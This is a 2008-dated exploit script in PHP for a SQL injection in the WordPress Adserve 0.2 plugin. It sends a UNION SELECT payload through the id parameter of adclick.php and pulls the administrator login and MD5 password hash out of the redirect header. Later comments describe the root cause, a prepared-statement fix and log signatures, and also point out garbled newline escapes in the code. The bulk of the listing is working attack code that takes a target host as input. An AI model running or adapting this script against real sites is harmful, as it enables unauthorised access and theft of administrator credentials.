# Title : Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit
# Published : 2008-01-30
# Author : enter_the_dragon
<?
# WordPress Adserve plugin v 0.2 Sql Injection Exploit
#
# Plugin Homepage-http://www.irisco.it/?page_id=40
#
# Found by:enter_the_dragon
#
# Vuln code
#
# -In adclick.php
#
# if (isset($_GET['id'])) {
# Header("Location: ".iri_AdServe_BannerClick($_GET['id'])
#
# -In iri_AdServe_BannerClick function
#
# return $wpdb->get_var("SELECT url FROM $table_name WHERE id=$id;");
#
# Root cause: the request's id value is interpolated straight into the
# SELECT, so it becomes part of the SQL statement, and whatever the query
# returns is echoed back verbatim in the Location response header.
#
# Mitigation (plugin side): never interpolate request values into SQL.
# Cast the id ((int) $_GET['id']) or use a prepared statement, e.g.
# $wpdb->prepare("SELECT url FROM $table_name WHERE id = %d", $id), and
# only emit a Location header when the result actually is a URL.
#
# Detection (site side): requests to adclick.php whose id parameter is
# non-numeric or carries SQL keywords (this script sends a UNION SELECT
# against wp_users), and 302 responses whose Location header does not
# contain a URL.
#
# Exploit
#
# id variable isn't filtered so we can inject and check the output in the Location response-header
# If exploit is successful WordPress administrator login and md5 hashed password is retrieved
#
# Script flow: print a banner, validate argv, build the request URL, fetch it
# with libcurl (response headers included), and on a 302 scan the response for
# the pipe-delimited marker the payload's concat() produces.
#
# NOTE(review): the "n" in the echo strings below (and in the exit() messages)
# is most likely a "\n" whose backslash was lost when this listing was extracted.
echo "n";
echo "-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------"."n";
echo "-------------------coded by : enter_the_dragon--------------------"."n";
echo "------------------------------------------------------------------"."n";
# Expects exactly two arguments: target host and the WordPress path.
if ($argc!=3)
{
echo " Usage: $argv[0] target_host wp_path n";
echo " target_host: Your target ex www.target.com n";
echo " wp_path: WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
echo "n";
exit;
}
# Build host + path + plugin script; wp_path must end with "/" because the
# plugin path is appended with no separator.
$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wp-adserve/adclick.php?";
# Payload: UNION SELECT against wp_users; 0x7c is "|", used as a delimiter so
# the result can be located in the Location header. This string (adclick.php
# plus union/select in id) is the signature to look for in access logs.
$query.="id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
# NOTE(review): curl_init is passed as a bare constant, not a quoted string.
if(function_exists(curl_init))
{
# Plain HTTP; headers are kept in the returned body so the Location line can be scanned.
$ch = curl_init("http://$query");
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$html=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
# The vulnerable handler redirects via Header("Location: ..."), so anything
# other than a 302 is treated as failure.
if($returncode==302)
{
# Looks for the delimiter-wrapped login followed by a 32-character
# [a-z0-9] token (md5 length, per the header comment).
$pattern="/|(.*)?|([a-z0-9]{32})|/";
if(preg_match($pattern,$html,$matches))
{
$adminusername=$matches[1];
$adminpass=$matches[2];
echo "Admin Login:$adminusernamen" ;
echo "Admin Pass :$adminpassn";
}
}
else
{
exit ("Exploit Failed :( n");
}
}
else
# No fallback transport: the script requires the curl extension.
exit("Error:Libcurl isnt installed n");
?>